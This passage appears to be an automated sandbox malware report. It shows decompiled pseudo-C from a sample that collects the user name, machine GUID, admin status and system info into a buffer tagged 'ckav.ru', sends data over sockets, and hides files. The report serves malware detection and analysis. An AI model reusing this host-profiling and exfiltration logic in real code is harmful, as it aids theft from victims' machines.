String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178
threadCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}

0x00412d31
0x00412d34
0x00412d39
0x00412d3c
0x00412d49
0x00412d50
0x00412d52
0x00412f24
0x00412f24
0x00412f2b
0x00412f30
0x00412f32
0x00412f37
0x00412f41
0x00412f53
0x00412f53
0x00412f5b
0x00412f60
0x00412d58
0x00412d58
0x00412d63
0x00412d6c
0x00412d73
0x00412d7e
0x00412d7f
0x00412d80
0x00412d81
0x00412d82
0x00412d8f
0x00412da1
0x00412da6
0x00412dae
0x00412db0
0x00412db1
0x00412db5
0x00412dce
0x00412dcf
0x00412dd5
0x00412dda
0x00412db7
0x00412db7
0x00412db8
0x00412dbe
0x00412dc4
0x00412dc9
0x00412dc9
0x00412de2
0x00412de4
0x00412de5
0x00412de7
0x00412de9
0x00412e02
0x00412e03
0x00412e09
0x00412e0e
0x00412deb
0x00412deb
0x00412dec
0x00412df2
0x00412df8
0x00412dfd
0x00412dfd
0x00412e11
0x00412e17
0x00412e19
0x00412e1a
0x00412e1e
0x00412e37
0x00412e38
0x00412e3e
0x00412e43
0x00412e20
0x00412e20
0x00412e21
0x00412e27
0x00412e2d
0x00412e32
0x00412e32
0x00412e4b
0x00412e4d
0x00412e4f
0x00412e7e
0x00412e8a
0x00412e8f
0x00412e51
0x00412e59
0x00412e67
0x00412e6d
0x00412e72
0x00412e72
0x00412e9e
0x00412eaf
0x00412eb4
0x00412ec0
0x00412ece
0x00412edc
0x00412eea
0x00412ef8
0x00412f0f
0x00412f14
0x00412f14
0x00412f17
0x00412f1d
0x00412f1f
0x00000000
0x00412f1f
0x00412f74

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}

0x00406340
0x00406345
0x00406373
0x00406373
0x00406347
0x0040634f
0x00406354
0x00406357
0x0040635c
0x00406366
0x0040636d
0x00000000
0x00406368
0x00406368
0x00406368
0x00406366
0x0040637a

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}

0x00406094
0x004060a8
0x004060ab

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}

0x00402c10
0x00402c15
0x00402c1b
0x00402c1e

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}

0x00404a56
0x00404a65
0x00404a6a
0x00404ad1
0x00404ad1
0x00404a6c
0x00404a71
0x00404a79
0x00404a85
0x00404a9a
0x00404a9e
0x00404acb
0x00000000
0x00404aa0
0x00404aac
0x00404abc
0x00404ac1
0x00404ac6
0x00404ac6
0x00404a9e
0x00404ad9

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}

0x00402b8c
0x00402b92
0x00402b96
0x00402b9e
0x00402ba3
0x00402baa

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00402BAB Relevance: 3.0, APIs: 2, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}

0x00402bb2
0x00402bc0
0x00000000
0x00402bc0
0x00402bc7

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}

0x004060c6
0x004060d5
0x004060d8
0x004060f4
0x004060f6
0x004060fb
0x0040610a
0x00406115
0x0040611c
0x0040611e
0x00406121
0x00000000
0x0040612a
0x0040612f

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}

0x00403c68
0x00403c70
0x00403c78
0x00403c82
0x00403c8b
0x00403c8f
0x00403c72
0x00403c76
0x00403c76

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}

0x0040643c
0x00406445
0x00406454

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}

0x00404eed
0x00404ef2
0x00404efd
0x00404efd
0x00404f07
0x00404f0e

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}

0x00403bdd
0x00403beb
0x00403bee

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}

0x0040428a
0x00404297
0x0040429a

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}

0x00404a27
0x00404a35
0x00404a38

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

